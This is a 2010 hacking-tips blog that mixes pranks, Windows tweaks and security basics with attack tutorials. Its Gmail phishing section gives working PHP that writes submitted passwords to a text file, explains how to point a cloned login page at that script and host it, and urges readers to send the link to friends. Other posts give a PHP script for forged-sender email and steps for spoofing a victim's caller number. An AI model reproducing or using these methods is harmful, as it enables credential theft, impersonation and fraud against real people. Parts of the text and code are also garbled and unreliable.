Extension Factory Builder

Monday, December 27, 2010

How to call your friends with their own number


How to call your friends with their own number

This is a very simple and cool trick by which you can call your friend with their number.You can confuse your and shock your friends.This trick is just free without of any cost
Mobile hack to call your friends:
Follow the following steps

1. Go to http://www.mobivox.com and register there for free account.
2. During registration, remember to insert Victim mobile number in “Phone number” field as shown below.
3. Complete registration and confirm your email id and then login to your account. Click on “Direct WebCall”.
4. You will arrive at page shown below. In “Enter a number” box, select your country and also any mobile number(you can enter yours).
Now, simply hit on “Call Now” button to call your friend with his own number.
Enjoy playing with your friends 

Cool JavaScript Tricks and Codes



Here is list of some cool java script Codes.To run these scripts you have to copy and paste these codes in your web browser and then hit enter.The java script will get executed.Javascript is a very cool language if you how to play with it.Check out some best example of this language.
1.This script code will pulls off all the images from your web page and rotates them in a circle. The best place to test is a website with many images. (Google Images for an example).you can try it on google .com also.


javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName(“img”); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position=’absolute’; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+”px”; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+”px”}R++}setInterval(‘A()’,5); void(0);
2.Shake the Browser.This Script will shake your browser check it out
javascript:function Shw(n) {if (self.moveBy) {for (i = 35; i > 0; i–) {for (j = n; j > 0; j–) {self.moveBy(1,i) ;self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} Shw(6)
3.Cool message trick Just type your message..
javascript: contentBodyEditable="true".DesginMode="Message
"

How toHack Gmail Account Password Hacking-----PHISHING ATTACK


We will we use very popular method to hack Gmail account password.I have posted this method for hacking facebook account password earlier  and now gmail account.That is Phishing.This is one of the best method to hack gmail  password.This will work only if your friend don’t know about this method of hacking gmail.
For this We need three files:
1.Fake gmail login page
2.Php file
3.Text file to store password
Create your php file
1.Open notepad and copy this code:
header (“Location: https://gmail.com”);
$handle = fopen(“password.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($ handle, “rn”);
fclose($handle) ;
exit;
?>
2.Now save this as gmailphishing.php
Your php file is now created
If you Don’t understand what this php file is doing you need to learn some basic of php.This php file will save information of victim in file password.txt
Create gmail fake login page
Now  go to http://www.gmail.com and right click / View Source.Copy source in notepad and save it as gmaillogin.html .Now open source code of this html file
We need to find the place where Login  code in gmail page that where send the user after clicking on it.
Now Press crtl-f after opening source code and   search for this code
action=anything.
In this case we have this
action=”https://www.google.com/accounts/ServiceLoginAuth?service=mail
We replace that part with:
action=”gmailphishing.php
Save your gmailfake.html file
Text file
Create a blank text file and name it password.txt
Now upload all the three files gmailfake.html,gmailphishing.php,Password.txt in any free web hosting site directory like 100mb.com and now you can just check your fake gmail login page by going to http://ursite.110mb.com/gmailfake.html for the fake login page.Just type some random user name and any password into the text box and then you will see in your file manager that a file called “Password.txt” is created,In which the password is stored.
also or any other free hosting site.
Suppose you register with name gmailaccounthack.Your link will behttp://www.gmailaccounhack.justfree.com/
After uploading files your phishing link will behttp://www.gmailaccount.justfree.com/fakegmail.html
Send this link to your friend if they login there their password will be save at the server .
You can trick your friend to login this fake facebook page by saying its new version of facebook check it out,or in any way you like
“Use this on your own responsibility for educational purpose only

Beginners Guide To Learn Ethical Hacking and become Hacker



How to learn Hacking

Here is book from which you can learn and become ethical hacker.This book contain every thing you need to know to become a security expert.A must read good book for beginners
Hacking
A-Beginners-Guide-to-Ethical-Hacking
How will the information in the book help you
  • You will learn All Ethical hacking techniques and also you will learn to apply them in real world situation
  • You will start to think like hackers
  • Secure your computer from trojans, worms, Adwares, etc.
  • Amaze your friends with your newly learned tricks
  • You will be able to protect your self from future hack attacks
  • And Much more…
If you buy now you will get

1000 Hacking Tutorials

For a limited time only , with the purchase of “A Beginner’s Guide to Ethical Hacking” you will receive the following bonus package! 1000 Hacking Tutorials contains 1000 of the best hacking tutorials of 2010 leaked on the internet!


Set of Phishers With the purchase of “A Beginner’s Guide to Ethical Hacking” you will also get a set of 30+ Phishers(Fake Login Pages) already created by the Author!

Click here to buy and download


Download Hacking Book

How to be Protected on Internet and Internet Viruses



The types of Software -
AlonWeb- This provides an old style facility to hide your computer IP address.
Wippien- This software keeps your chat secrets with your contacts. Those who are concerned about their secrecy on online conversation, then Wippen is the best option.
UltraVpn-This software helps the user in blocking the specific IP address.
BirdsSoft VPN-X-The very important feature of this software is that it makes two or more computers to link privately and restore the secure connection.
There ismuch more similar software.
Software Requirements-
Operating System- For this The newest version of Windows operating system is compulsory, like- ME, Windows 98, 2000, XP.
Internet Explorer- In order to evade any software mistakes, Internet Explorer 6 is highly suggested.
Antivirus Software-While using this service there is need of anti-virus. This lessens the attack of viruses. This software’s are low cost and can be easily installed in the existing equipment.

Computer Viruses-

Viruses are actually the trivial software programs which are intended to extent from one computer to another and affect the computer operation. They are very dangerous. They can ruin the entire data of your computer and can extent itself through your email to other computers.
They are widely spread through email, attachments, images, greeting cards, audio- video files downloads etc.
Surprisingly people who make viruses might have slight or no programming knowledge.
Software which are responsible for creating viruses-
VCS-
Which is popularly known as Virus Construction Set- was the first software which was completely made for generating of viruses.
GenVirus-
is also the very well-known software for viruses. Around 15 viruses generated by this software are said to exist.
VCL
Virus Creation Library is the best recognized virus formation software. It produces files and modules which are infected by the viruses.
PS-MPC
Phalcon-Skism Mass-Produced Code Generator virus is created in America which generates memory-resident virus which disturbs the COM and EXE records and documents. They are liable for hundreds of virus formation in the computer.
NGVC
Next Generation Virus Construction Kit-The one thing about these viruses is- all the viruses formed under this kit are dissimilar in body and making it very difficult to catch through scanning.
VBSWG Kit-
This kit advanced from Argentina and does not highly affects the programming of the computer, the viruses and worms formed under this kit did not shown any big harm to the programming.
NRLG
Nuke Randomic Life Generator virus again originated from Argentina but it is very dangerous as compare to NGVC. They are liable for creating thousands of viruses which are all noticeable through our modern anti-virus scanners
.

How to Sign Out of Gmail Account Remotely


How to Sign Out of Gmail Account Remotely


Sign Out of Gmail Account Remotely

Gmail is one of the widely use email service.There are lot of features in gmail. There is a security feature for gmail known as remote logout. Many of use more than one computers to login to gmail account. Some times we often leave the browser opened & not being logged out of gmail or we are in cyber cafe and any power cut or computer faliure occurs and  if the computer is at office or any public place your account may be hacked or misused by someone else.
But there is a method by which you can l;og out from your gmail account remotely.
Open you gmail account and go to bottom of the page ,there you will see something as shown below..
gmail-remote-logout
gmail-remote-logout
Now you can click on “Details”  which shows you a pop-up having details about your last sessions.Click on “Sign out all other sessions” to sign out of gmail at all other places exept the current.
By this simple feature you can check that your gmail account is hacked or not
.

Get Facebook Email Address – Invitation to Messages




How to Get Facebook Email Address

Facebook has just new features in which it will give email addresses to users ,at this time facebook email id is not open to everyone ,you have to request invittation.In order to get a invite to this new service you need to visit following  link where in you would be asked to click on the ‘Request Invite’ button.

How to Use God Mode in Windows 7



How to Use God Mode in Windows 7

Windows 7 is now becoming popular among windows operating system  users.Windows 7 has cool hidden feature ,people calls it godmode in windows 7.GodMode is a folder that brings together a long list of customization settings allowing you to change all your settings from one place.This is very good as you can now change all your windows settings from one single place.
God Mode in Windows 7
God Mode in Windows 7
Foll the following steps to create god mode folder:
1. Create a new folder
2. Rename the folder to GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}
You can change word GodMode to any other word you like your name or your friends name

3.The folder icon will change ,then  double click it to show the GodMode windows options.

HOW TO PROTECT YOUR WEBSITE FROM HACKERS?

Creating your own website is not simply about putting some pages and information online. Ensuring the security of your website is a bigger and highly crucial task. Most websites these days have a dedicated web server that gives them the leverage to grow and develop further. Basically the websites with a high volume of web traffic, a heavy database and complex application specifications require an exclusive web server. It is extremely important to hack proof your web server in order to protect your website and business.
There are a great number of hackers out there in the web world who are looking for opportunities to exploit your web server and cause serious damage. These hackers look to deface the websites with malicious content, use the scripts on the server to send out spam or phish out the personal sensitive information of the website users. Such attacks also attempt to tamper with parameters and gain access to confidential files or cross-site scripting or cookie poisoning to alter the customer data. These kinds of invasions can prove to be fatal for e-commerce and finance based websites. To prevent your web server from falling prey to such web attacks, here are some important recommendations and anti hacking tips.You need to follow a two-pronged approach to safeguard your web server from any hackers.
The first layer is a firewall that exists to block any unwarranted unused Internet ports. A good firewall will use a rule based access system to allow only the legitimate users to enter and filter out as well as obstruct any malicious traffic from accessing the server. Also create strong passwords that use a combination of characters, numbers and special characters in order to keep the password hackers at bay.
The second element is to put in place an intrusion protection service. This is a more sophisticated approach to deal with hackers wherein you stop the illegitimate entry of users at the source itself. If a firewall works on the front line, an intrusion protection system works on the back end to deal with the enemies. This involves putting all the compromised hosts in the quarantine section and letting the genuine users move through efficiently. But setting up such an anti-hacking arrangement is only the first step. The hackers are moving fast and ahead with newer techniques to break into and sabotage the web servers. So, you need to continually update and monitor the filters, blacklists and all other aspects.

How to Remove CD Burning Features.



How to Remove CD Burning Features. Windows Registry Editor Version 5.00 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] “NoCDBurning”=dword:00000001 Share this post with your friends if you liked it .

How to Add Command Prompt to the Right Click

.


Windows Registry Editor Version 5.00 Go to Run > Type regedit [HKEY_CLASSES_ROOT\Directory\shell\Command Prompt Here] @="Command &Prompt Here" [HKEY_CLASSES_ROOT\Directory\shell\Command Prompt Here\command] @="cmd.exe /k cd %1 " Share this post with your friends if you liked this post.

PHISHING



• The act of sending an Email to a user falsely claiming to be an
  established legitimate enterprise in an attempt to scam the user
  into surrendering private information that will be used for
  identity theft.


• The Email directs the user to visit a Web site where they are
  asked to update personal information, such as passwords and
  credit card, social security, and bank account numbers, that the
  legitimate organization already has. The Web site, however, is
  Bogus and set up only to steal the User’s information.

Email Password Hacking



• There is no specified attack available just to hack the password
   of Email accounts. Also, it is not so easy to compromise the
    Email server like Yahoo, Gmail, etc.


• Email Password Hacking can be accomplished via some of the
  Client Side Attacks. We try to compromise the user and get the
  password of the Email account before it reaches the desired
  Email server.


• We will cover many attacks by the workshop flows, but at this
   time we will talk about the very famous 'Phishing attack'.

Consequences of Fake Emails



1.Email from your Email ID to any Security Agency
   declaring a Bomb Blast can make you spend rest of your
   life behind the iron bars.


2.Email from you to your Girl friend or Boy friend can cause
   Break-Up and set your friend’s to be in relationship.


3.Email from your Email ID to your Boss carrying your
   Resignation Letter or anything else which you can think
   of.
                 There can be so many cases drafted on Fake
                 Emails.

HTML SCRIPT

<html>
<h1>Manish's Anonymous Email Mail Sender (For Educational Purpose Only)</h1>
</html>


<table border=2>
<form action="" method=post>
<tr><td>Recipent: </td><td><input type=text name=email size=30></td></tr>
<tr><td>Sender name: </td><td><input type=text name=name size=30></td></tr>
<tr><td>Sender Email Address: </td><td><input type=text name=sender size=30></td></tr>
<tr><td>Subject: </td><td><input type=text name=subject size=30></td></tr>
<tr><td>Content: </td><td><textarea rows=10 cols=30 name=content></textarea></td></tr>
<tr><td><input type=submit value="Send Mail"></td></tr>
</form>
</table>




<?php
$email = $_POST['email'];
$content = nl2br($_POST['content']);
$name = $_POST['name'];


$sender = $_POST['sender'];


$subject = $_POST['subject'];


$headers = "From: $name "."<".$sender.">\r\n";


mail($email, $subject, $content, $headers );


?>

Attacks on Email and Security Measures

Methods to send Fake Emails


            • Open Relay Server
            • Web Scripts


  1. 
Fake Email: Open Relay Server


            • An Open Mail Relay is an SMTP (Simple Mail Transfer Protocol)
               server configured in such a way that it allows anyone on the
               Internet to send Email through it, not just mail destined ‘To’ or
               ‘Originating’ from known users.
            • An Attacker can connect the Open Relay Server via Telnet and
               instruct the server to send the Email.
            • Open Relay Email Server requires no password to send the
              Email.
   2.Fake Email via Web Scripts
            • Web Programming languages such as PHP and ASP contain the
              mail sending functions which can be used to send Emails by
              programming Fake headers i.e.” From: To: Subject:”
           • There are so many websites available on the Internet which
              already contains these mail sending scripts. Most of them
              provide the free service.
          • Some of Free Anonymous Email Websites are:
                   o Mail.Anonymizer.name (Send attachments as well)
                   o FakEmailer.net
                   o FakEmailer.info
                   o Deadfake.com


>>>>>>>>>>>>>>>>>>>>>>>>>>> SCRIPT IN NEXT BLOG:--

>>>>>>>>>>>>>Hacker Vs. Cracker<<<<<<<<<<<<<<<<<<<<<<

What Is the Difference Between a Hacker and a Cracker?


Many articles have been written about the difference between Hackers and
crackers, which attempt to correct public misconceptions about hacking. For
many years, media has applied the word Hacker when it really means
Cracker. So the public now believe that a Hacker is someone who breaks into
computer systems and steal confidential data. This is very untrue and is an
insult to some of our most talented Hackers.



>>>>>>>>>Why Hackers Hack<<<<<<<<<<<

The main reason why Hackers hack is
because they can hack. Hacking is a
casual hobby for some Hackers —
they just hack to see what they can
hack and what they can’t hack, usually
by testing their own systems. Many
Hackers are the guys who get kicked
out of corporate and government IT
and security organizations. They try to
bring down the status of the
organization by attacking or stealing
information.

Sunday, December 26, 2010

=>>>>>>WHAT IS HACKING?<<<<<<<=



• Computer Hackers have been
around for so many years. Since
the Internet became widely used in
the World, We have started to hear
more and more about hacking.
Only a few Hackers, such as Kevin
Mitnick, are well known.
• In a world of Black and White,
it’s easy to describe the typical
Hacker. A general outline of a
typical Hacker is an Antisocial,
Pimple-faced Teenage boy. But the
Digital world has many types of
Hackers.

Hackers are human like the rest of
us and are, therefore, unique
individuals, so an exact profile is
hard to outline. The best broad
description of Hackers is that all
Hackers aren’t equal. Each
Hacker has Motives, Methods and
Skills. But some general
characteristics can help you
understand them. Not all Hackers
are Antisocial, Pimple-faced
Teenagers. Regardless, Hackers
are curious about Knowing new
things, Brave to take steps and
they are often very Sharp Minded.


=>>>>>>WHAT IS A HACKER<<<<<<=

Hacker is a word that has two
meanings:
• Traditionally, a Hacker is
someone who likes to play with
Software or Electronic Systems.
Hackers enjoy Exploring and
Learning how Computer systems
operate. They love discovering new
ways to work electronically.
• Recently, Hacker has taken on a
new meaning — someone who
maliciously breaks into systems for
personal gain. Technically, these
criminals are Crackers as Criminal
Hackers. Crackers break into
systems with malicious intentions.
Hi Guys ...this is Manish-ethical hacker...I have made this blog to teach you the basics of hacking.....ITS TOO EASY.....

------------------------------TOPICS I WILL COVER on starting days -----------------------------------
Reading the Hacker’s mind and Understanding the hacking
  • psychology and methodology  
  • Introduction to Hacking
     
  • Real Meaning of Hacking v/s Public Perspective
     
  • Difference between Hacker and Cracker
     
  • Categories of Hackers: Based on Knowledge
     
  • Categories of Hackers: Based on Actions
     
  • Hactivism and Cyber Terrorism
     
  • Why Hackers Hack?
     
  • Steps performed by Hackers
     
  • Ethical Hacking and Penetration Testing
  • Introduction to Penetration Testing
     
  • Difference between Hacking and Ethical Hacking
     
  • Types of Penetration Testing
     
  • Steps in Penetration Testing
Next post cumin soonnnn.....!!!!